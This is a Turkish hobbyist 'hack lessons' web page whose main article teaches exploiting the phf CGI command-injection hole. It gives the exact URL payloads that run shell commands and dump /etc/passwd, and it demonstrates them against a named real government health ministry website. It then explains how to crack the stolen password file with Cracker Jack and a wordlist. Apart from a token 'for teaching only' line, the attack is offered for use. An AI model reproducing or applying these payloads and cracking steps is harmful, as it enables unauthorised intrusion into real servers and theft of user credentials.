Hack Dersleri
SAYFALAR  
  Ana Sayfa
  BACKDOOR
  BEDAVA TEL
  EXPLOITLER
  FİNE READER
  FTP HACK
  HELP TROJEN
  ICQ ve GÜVENLİĞİ
  HOTMAİL HACK
  IP GİZLE
  IP GİZLE - 2
  LOGO ALINTERİ
  LOGO KLASİK
  MIRC KOMUTLARI
  NICK DEĞİŞTİR
  PROGAM NASIL KIRILIR ?
  SAHTE IP
  Shadowed Password Dosyası ve TCB
  Trojen Portları
  Trojen Temizleme
  WEBSİTE HACK
  ŞİFRE OLMADAN ICQ SERVERİNE GİRME
  İletişim
 
WEBSİTE HACK

Selamlar... Bu yazıda daha basit ama daha hızlı bir hack yöntemini anlatacağım
Bu yöntem çok hoşunuza gidecek Gerekli Programlar : Internet Explorer
haricinde bir web browser, Cracker Jack ve tabiki Meliksah Ozoral's Dict Maker.
--------------------------------------
          Mantık : phf sistemlerde bulunan bir açıktır ve bu acık sayesinde sisteme
web uzerinden baglanip shellde bazi komutlari calistirabilirsiniz...
Not : Calistirdiginiz komutlar cd, ls, cat gibi komutlar silme islemlerini
phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan
passwd dosyasini alabilir ve kirabilirsiniz...Bu olay web uzerinden
olur ve hizli olur |:)~ eNJOy!
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar.../cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlarsistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd
etc dizinin altindaki passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki dosyalar
goruntulenir.../cgi-bin/phf?Qalias=x%0als%20pass*
yazarsaniz bulundugunuz dizinde pass ile baslayan butun dosyalari listeler...
Komutun Kullanimi Kolay!
Simdi Biraz Ornek Cozelim!
--------------------------------------
Evet bu ornek kesinlikle ogretim amacli cozulmusdur herhangi bir art niyetim
yok |;)~
Hedef : T.C. Saglik Bakanligi
Gerekli Bilgiler : Sadece web sayfalarinin
adresi : www.saglik.gov.tr
Browser inizi calistirin...
Adres olarak www.saglik.gov.tr yazin.Evet sayfa geldi simdi bakalim phf acigi var mi ?
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0als yazin!
tamam dosya listesi karsimiza geldigine gore phf olayi isliyor...
Simdi passwd dosyasini alalim...cat /etc/passwd komutu ile...
bu nu phf ile asagidaki gibi yaziliyor...                            http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
tamam Ok dir password dosyasini gordunuz! bunu simdi cut/copy/paste ile bir
dosyaya saklayin...Internet baglantisini kesin ve dos moduna
gecin... Sakladiginiz dosyayi Cracker Jack adli programin bulundugu dizine kopyalayin.
Eger daha onceden hazirladiginiz bir wordlist varsa Cracker Jack ile "passwd"
dosyasini kirmaya baslayin yoksa once Meliksah Ozoral's Dict Maker v1.0 ile
bir wordlist hazirlayin... Cracker Jack passwd dosyasindaki acclari kirmaya baslar... Bu islem
gunlerce surer ve kirdigi acclari kullanabilirsiniz...
Turgay ERBAY  
  Aklınıza Takılan Soruları: http://www.facebook.com/bitlizade adresinden sorabilirsiniz.  
Bugün 4 ziyaretçi (6 klik) kişi burdaydı!
Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?
Ücretsiz kaydol